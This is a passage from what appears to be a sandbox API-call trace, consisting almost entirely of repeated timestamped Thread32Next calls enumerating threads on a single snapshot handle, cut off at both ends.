lpte=0x14fe78) returned 1 [0170.851] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.852] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.853] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.854] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.855] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.856] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.857] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.858] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.859] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.860] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.861] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.862] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.863] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.864] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.865] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.866] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.867] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.868] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.869] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.870] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.871] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.872] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.873] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.874] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.875] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.876] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.877] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.878] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.879] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.880] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.881] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0170.882] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.096] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.097] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.098] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.099] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.100] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.101] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.102] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.103] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.104] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.105] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.106] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.107] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.108] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.109] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.110] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.111] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.112] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.113] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.114] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.115] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.116] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.117] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.118] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.119] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.120] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.121] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.122] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.123] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.124] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.125] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.126] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.127] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.128] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.129] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.130] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.293] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.294] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.295] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.296] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.297] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.298] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.299] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.300] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.301] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.302] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.303] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.304] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.305] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.306] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.307] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.308] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.309] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.310] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.311] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.312] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.313] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.315] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.316] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.317] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.318] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.319] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.320] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.321] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.322] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.323] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.324] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.325] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.326] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.327] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.328] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.484] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.485] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.486] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.487] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.488] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.489] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.490] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.491] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.492] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.493] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.494] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.495] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.496] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.497] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.498] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.499] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.500] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.501] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.502] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.503] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.504] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.505] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.506] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.507] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.508] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.509] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.510] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.511] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.512] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.513] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.514] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.515] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.516] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.517] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.518] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.689] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.690] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.691] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.692] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.693] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.694] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.695] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.696] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.697] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.698] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.699] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.700] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.701] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.702] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.703] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.704] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.705] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.706] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.707] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.708] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.709] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.710] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.711] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.712] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.713] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.714] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.715] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.716] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.717] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.718] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.719] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.720] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.721] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.722] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.723] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.724] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.979] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.980] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.981] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.982] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.983] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.984] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.985] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.986] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.987] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.988] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.989] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.990] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.991] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.992] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.993] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.994] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.995] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.996] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.997] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.998] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0171.999] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.000] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.001] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.002] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.003] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.004] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.005] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.006] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.007] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.008] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.009] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.010] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.011] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.012] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.013] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.014] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.178] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.179] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.180] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.181] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.182] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.183] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.184] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.185] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.186] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.187] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.188] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.189] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.190] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.191] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.192] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.193] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.194] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.195] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.196] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.197] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.198] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.199] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.200] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.201] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.202] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.203] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.204] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.205] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.206] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.207] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.208] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.209] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.210] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.211] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.212] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.385] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0172.386] Thread32Next 